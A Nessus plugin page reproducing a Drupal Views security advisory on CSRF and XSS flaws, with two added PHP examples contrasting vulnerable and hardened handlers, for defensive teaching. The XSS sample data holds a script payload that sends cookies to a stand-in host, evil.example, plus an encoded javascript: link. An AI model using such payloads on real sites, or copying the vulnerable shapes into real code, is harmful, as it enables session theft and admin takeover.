Fedora 11 : drupal-views-6.x.2.11-1.fc11 (2010-10197)

This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.


Synopsis :

The remote Fedora host is missing a security update.

Description :

- Advisory ID: DRUPAL-SA-CONTRIB-2010-067 (http://drupal.org/node/829840)
  * Project: Views (third-party module)
  * Version: 5.x, 6.x
  * Date: 2010-June-16
  * Security risk: Less critical
  * Exploitable from: Remote
  * Vulnerability: Multiple vulnerabilities

-------- DESCRIPTION ------------------------------------------------------

The Views module provides a flexible method for Drupal site designers to
control how lists and tables of content are presented.

-------- CROSS SITE REQUEST FORGERY (CSRF) --------------------------------

The Views UI module, which is included with Views, can be used to
enable/disable Views by following a link to a particular page (e.g.
admin/build/views/disable/frontpage). As no protections, such as form
tokens, are in place to prevent forged requests to these pages, the
feature is vulnerable to a Cross Site Request Forgery (CSRF [1]) that
would allow an attacker to enable/disable all Views on a site.

Mitigating factors: If the Views UI module is disabled, Views is no
longer affected by this vulnerability. This issue affects Views for
Drupal 5 and Drupal 6.

-------- CROSS SITE SCRIPTING (XSS) ---------------------------------------

Under certain circumstances, Views could display URLs or aggregator feed
titles without escaping, resulting in a Cross Site Scripting (XSS [2])
vulnerability. An attacker could exploit this to gain full administrative
access. This issue affects Views for Drupal 6 only.

-------- VERSIONS AFFECTED ------------------------------------------------

* Views module for Drupal 5.x versions prior to 5.x-1.8
* Views module for Drupal 6.x versions prior to 6.x-2.11

Drupal core is not affected. If you do not use the contributed Views [3]
module, there is nothing you need to do.

-------- SOLUTION ---------------------------------------------------------

Install the latest version:
* If you use the Views module for Drupal 5.x, upgrade to Views 5.x-1.8 [4]
* If you use the Views module for Drupal 6.x, upgrade to Views 6.x-2.11 [5]

See also the Views project page [6].

-------- REPORTED BY ------------------------------------------------------

* The Cross Site Request Forgery (CSRF) vulnerability was reported by
  Martin Barbella (mbarbella [7]).
* The Cross Site Scripting (XSS) vulnerabilities were reported by Earl
  Miles (merlinofchaos [8]), module maintainer, and Daniel Wehner
  (dereine [9]), module co-maintainer.

-------- FIXED BY ---------------------------------------------------------

* Earl Miles (merlinofchaos [10]), module maintainer

-------- CONTACT ----------------------------------------------------------

The Drupal security team [11] can be reached at security at drupal.org or
via the form at http://drupal.org/contact.

* [1] http://en.wikipedia.org/wiki/Csrf
* [2] http://en.wikipedia.org/wiki/Cross-site_scripting
* [3] http://drupal.org/project/views
* [4] http://drupal.org/node/829848
* [5] http://drupal.org/node/829846
* [6] http://drupal.org/project/views
* [7] http://drupal.org/user/633600
* [8] http://drupal.org/user/26979
* [9] http://drupal.org/user/99340
* [10] http://drupal.org/user/26979
* [11] http://drupal.org/security-team

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
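The CSRF issue in the advisory is the classic link-driven state change: a GET to admin/build/views/disable/<name> flips the view, and the browser attaches the admin's cookies to that request no matter which page issued it. The following is an added example, not code from Views or Drupal: a stand-alone PHP script with a handler in that vulnerable shape beside a hardened one that requires a token bound to both the session and the specific action. The function names, the $views state, the session secret and the request URIs are all constructed for the illustration.

```php
<?php
// Added example (not Views/Drupal code). Demonstrates the vulnerable
// link-driven enable/disable handler beside a token-checked version.
// All names (handle_toggle_*, build_toggle_link, $views) are hypothetical.

declare(strict_types=1);

// Constructed site state: which views are currently enabled.
$views = ['frontpage' => true, 'archive' => true, 'glossary' => true];

// Constructed per-session secret. Drupal derives its form token from the
// session id plus a site-wide private key; a random secret stands in here.
$session = ['id' => 'sess_' . bin2hex(random_bytes(8)), 'secret' => random_bytes(32)];

// Vulnerable shape: any GET to /admin/build/views/<action>/<name> that the
// admin's browser is made to issue (img tag, hidden iframe, link) succeeds,
// because only the cookie-based session is checked.
function handle_toggle_vulnerable(array &$views, string $action, string $name): bool {
    if (!isset($views[$name]) || !in_array($action, ['enable', 'disable'], true)) {
        return false; // unknown view or action: a 404 in a real site
    }
    $views[$name] = ($action === 'enable');
    return true;
}

// Token bound to the session secret AND to action+view, so a token obtained
// for one link cannot be replayed against a different view.
function csrf_token(array $session, string $action, string $name): string {
    return hash_hmac('sha256', "$action/$name", $session['secret']);
}

// The site renders its own links with the token attached; an attacker's page
// cannot read it (same-origin policy) and so cannot forge a valid link.
function build_toggle_link(array $session, string $action, string $name): string {
    return "/admin/build/views/$action/$name?token=" . csrf_token($session, $action, $name);
}

// Hardened shape: identical except that the request must carry the token.
function handle_toggle_hardened(array &$views, array $session, string $action,
                                string $name, ?string $token): bool {
    if (!isset($views[$name]) || !in_array($action, ['enable', 'disable'], true)) {
        return false;
    }
    if ($token === null || !hash_equals(csrf_token($session, $action, $name), $token)) {
        return false; // missing or wrong token: treat as access denied
    }
    $views[$name] = ($action === 'enable');
    return true;
}

// Parse a request URI of the form the advisory cites into action/name/token.
function parse_toggle_request(string $uri): ?array {
    $parts = parse_url($uri);
    if (!preg_match('#^/admin/build/views/(enable|disable)/([a-z0-9_]+)$#', $parts['path'] ?? '', $m)) {
        return null;
    }
    parse_str($parts['query'] ?? '', $q);
    return ['action' => $m[1], 'name' => $m[2], 'token' => $q['token'] ?? null];
}

// 1. Forged request: an attacker-controlled page makes the logged-in admin's
//    browser fetch the bare link. The vulnerable handler disables the view.
$forged = parse_toggle_request('/admin/build/views/disable/frontpage');
handle_toggle_vulnerable($views, $forged['action'], $forged['name']);
printf("vulnerable, forged request:  frontpage enabled = %s\n", var_export($views['frontpage'], true));
$views['frontpage'] = true; // reset for the next case

// 2. Same forged request against the hardened handler: no token, rejected.
$ok = handle_toggle_hardened($views, $session, $forged['action'], $forged['name'], $forged['token']);
printf("hardened, forged request:    accepted = %s, frontpage enabled = %s\n",
       var_export($ok, true), var_export($views['frontpage'], true));

// 3. Legitimate request: the admin clicks a link the site rendered for them.
$legit = parse_toggle_request(build_toggle_link($session, 'disable', 'frontpage'));
$ok = handle_toggle_hardened($views, $session, $legit['action'], $legit['name'], $legit['token']);
printf("hardened, legitimate link:   accepted = %s, frontpage enabled = %s\n",
       var_export($ok, true), var_export($views['frontpage'], true));

// 4. Replaying the frontpage token against another view is rejected, because
//    the token is bound to the action and view name.
$ok = handle_toggle_hardened($views, $session, 'disable', 'archive', $legit['token']);
printf("hardened, replayed token:    accepted = %s, archive enabled = %s\n",
       var_export($ok, true), var_export($views['archive'], true));
```

In a Drupal 6 module the equivalent is drupal_get_token($value) when rendering the link and drupal_valid_token($token, $value) in the page callback (or, cleaner still, routing the action through a confirmation form so the change happens on POST rather than on a bare GET, which also keeps the token out of the URL and Referer headers). Whichever form is used, the point the advisory makes is that a session cookie alone proves nothing about which page caused the request; the token is what ties the request to a page the site itself rendered.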

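The XSS part of the advisory concerns URLs and aggregator feed titles rendered without escaping. Feed content is attacker-controlled by definition, and a URL needs more than HTML escaping, since "javascript:" contains nothing that htmlspecialchars() would alter. The script below is an added example, not Views code: it renders constructed feed items in the unescaped shape beside an escaped one that also filters the URL scheme. The sample items, function names and the allowed-scheme list are hypothetical; the scheme filter is written out in plain PHP rather than calling Drupal's check_url(), whose job it imitates.

```php
<?php
// Added example (not Views/Drupal code). Renders feed title and link into a
// table cell without escaping, then with text escaping plus URL scheme
// filtering. Sample items are constructed; the second one is hostile.

declare(strict_types=1);

const FEED_ITEMS = [
    ['title' => 'Fedora 11 released', 'link' => 'http://fedoraproject.org/'],
    ['title' => 'News<script>document.location="http://evil.example/?c="+document.cookie</script>',
     'link'  => 'java&#115;cript:alert(document.cookie)'],
];

// Vulnerable shape: values dropped straight into markup. With an admin
// viewing the page, the script runs with the admin's session.
function render_item_vulnerable(array $item): string {
    return '<td><a href="' . $item['link'] . '">' . $item['title'] . '</a></td>';
}

// Escape text for an HTML body or attribute context (what check_plain() does).
function escape_html(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Sanitize a URL for an href attribute. Decode entities and strip control
// characters first so "java&#115;cript:" or "java\tscript:" cannot smuggle
// a scheme past the check; then strip any scheme that is not allowed,
// repeatedly, so "javascript:javascript:..." does not survive one pass.
function sanitize_url(string $url): string {
    $allowed = ['http', 'https', 'ftp', 'mailto'];
    $clean = html_entity_decode($url, ENT_QUOTES, 'UTF-8');
    $clean = preg_replace('/[\x00-\x1f\x7f]+/', '', $clean);
    for ($i = 0; $i < 10; $i++) {
        if (!preg_match('/^([a-z][a-z0-9+.-]*):/i', $clean, $m)) {
            break; // no scheme: relative URL, harmless as a link target
        }
        if (in_array(strtolower($m[1]), $allowed, true)) {
            break; // allowed scheme, keep it
        }
        $clean = substr($clean, strlen($m[0])); // drop the bad scheme
    }
    return escape_html($clean);
}

// Hardened shape: every value is escaped for its context before output.
function render_item_hardened(array $item): string {
    return '<td><a href="' . sanitize_url($item['link']) . '">'
         . escape_html($item['title']) . '</a></td>';
}

// Rough check used for the demonstration: did active content reach the markup?
function contains_active_content(string $html): bool {
    return stripos($html, '<script') !== false
        || preg_match('/href="\s*javascript:/i', $html) === 1;
}

foreach (FEED_ITEMS as $item) {
    $bad  = render_item_vulnerable($item);
    $good = render_item_hardened($item);
    printf("vulnerable (active content: %s): %s\n", var_export(contains_active_content($bad), true), $bad);
    printf("hardened   (active content: %s): %s\n\n", var_export(contains_active_content($good), true), $good);
}
```

The two escaping steps are deliberately separate: escape_html() protects the text node and the attribute delimiters, while sanitize_url() decides whether the value is acceptable as a link target at all. Applying only the first is the mistake that leaves a clickable "javascript:" link intact; applying only the second leaves the title's script tag in place.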
See also :

http://drupal.org/node/829840
http://drupal.org/node/829846
http://drupal.org/node/829848
http://drupal.org/project/views
http://en.wikipedia.org/wiki/Cross-site_scripting
http://en.wikipedia.org/wiki/Csrf
http://www.nessus.org/u?9e24a3bc

Solution :

Update the affected drupal-views package.

Risk factor :

High

Family: Fedora Local Security Checks

Nessus Plugin ID: 47213 (fedora_2010-10197.nasl)

Bugtraq ID:

CVE ID:
